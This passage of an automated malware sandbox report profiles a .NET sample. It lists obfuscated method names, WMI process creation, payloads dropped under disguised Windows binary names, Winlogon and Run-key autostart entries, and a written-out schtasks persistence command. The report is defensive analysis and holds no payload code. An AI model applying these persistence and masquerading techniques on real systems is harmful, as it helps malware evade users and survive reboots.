Source: 4KjLUaW30K.exe, In2HXcVN9wxsAnCqVMp.cs High entropy of concatenated method names: 'CrePEgqTUP', 'qcdPrF13AM', '_8r1', 'k73PVBTUS5', 'uQJP3y0j5Q', 'xkdPIjTHYY', 'g1PP0PMCGw', 'fURRSIEaaM45UyKEpJa', 'mG1AudEsI73tO7rsAK4', 'yQUqYjEiG38IawuNPGR'
Source: 4KjLUaW30K.exe, FU1X10NWvKNOjTcC2nM.cs High entropy of concatenated method names: 'gN64dglan8', 'm91uQ1MPrh07iLaVrDg', 'GHoNVqM5PvTpMBnBruH', 'kOqTijMlq5vfNM8ESMh', 'aC67hhMnT9QW3YxmHeM', 'hVMTJJMNkPhNID5HTjr', 'rRR4GNXMjy', 'wsX4apAjCs', 'tZd4lWsyRw', 'Sli4JHnIW1'
Source: 4KjLUaW30K.exe, EC6tmKYFR1lQypjwusk.cs High entropy of concatenated method names: 'TJUm35uJ8w', 'CwFmI5L5Fe', 'kF9ZvbDA8MGLGUN2inr', 'pQpAOHDg1vFDpqdcpGI', 'g1UQjyDDk21latNkXRD', 'MdVTWpDZg1MTHPwGlqU', 'bk39VdDpLfEYmEZWcib', 'dqajbTDYDZx18rd167P', 'MyV3yrDjflSq7eve4if', 'IInUo0Da0sW0Elay583'
Source: 4KjLUaW30K.exe, K6waluVpfIvquEd1qvm.cs High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'T8UKdTHhVC', 'ebyKPAHIfJ', 'G2hKK3jZxb', 'AtJKv92d7j', 'AsBKs3rQDs', 'w08KkG9hCr', 'oINDWxVxHBeHE3BHYpZ'
Source: 4KjLUaW30K.exe, mFIbZKVrbMDQqEPTYXE.cs High entropy of concatenated method names: 'g43sRTMwLD', 'EmHYZw8HPXO1pYsXSPS', 'KIogXG87rXO2kUHBCZE', 'EbMNPn81KTBMacqrMv8', 'jmOl0989OpjvvfJDbYo', '_1fi', 'BwWvXTxBsh', '_676', 'IG9', 'mdP'
Source: 4KjLUaW30K.exe, qVycdWNnytWDx624cS0.cs High entropy of concatenated method names: 'zoFnibXSnZ', 'ebonNx7sgZ', 'U5xnzEa44Y', 'cFKH6vFfWL', 'NWHHb2CMK5', 'ztpHmUTtyO', 'S7LHOWlYGN', 'zWoHnGkLpF', 'bMFHHI9Eje', 'Arew4Ra6sKThxRiDpQh'
Source: 4KjLUaW30K.exe, Y9NpIshBHL4JO7SnlPl.cs High entropy of concatenated method names: 'PWQET0Pmyg', 'LUaEeAPLSd', 'DupEwCNl5N', 'RqREZULZ1y', 'IAhEyvABNU', 'XWeZSPWdkGjlbph5HFi', 'IBhGiiWu1GA0LRS8cMn', 'M9OAkQWJLgwVtd40gHh', 'WFobjQWTbc3VJJkuFU2', 'ew3do9W4gmgXVZKc2el'
Source: 4KjLUaW30K.exe, cEysALYXdvyMaKji4lm.cs High entropy of concatenated method names: 'It0be5mNyZ', 'H82xFBgGZ5itCco9RXp', 'YGGW2HgQrlrqNG8pBGG', 'qZZfbogkEhA3Ldj1WVp', 'X3jWTUgbXERTtNLXwBY', 'QsEHn5gmJr13MaVVIDP', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: 4KjLUaW30K.exe, YmMbmIvAdsNpT2XQkN4.cs High entropy of concatenated method names: 'GkJ8d8w40H', 'RwY8K4kiN0', 'gRO8WbkxrE', 'OHc81EAoOA', 'udd880VtOj', 'j1J8cxI9Na', 'dB88Uanel7', 'ip38MmV0DO', 'dqH8GPwq6f', 'CHp8aRgU97'
Source: 4KjLUaW30K.exe, k6mtCxV7NVUlG284iNa.cs High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Recovery\System.exe Jump to dropped file
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Jump to dropped file
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Jump to dropped file
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe File created: C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe Jump to dropped file
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Program Files (x86)\Windows Defender\dllhost.exe Jump to dropped file
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe Jump to dropped file
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Users\Public\Downloads\ShellExperienceHost.exe Jump to dropped file
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Jump to dropped file

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Creates multiple autostart registry keys
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Recovery\System.exe'" /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ShellExperienceHost Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhost Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mnUYCZffXdEgQlZPiczLektp Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
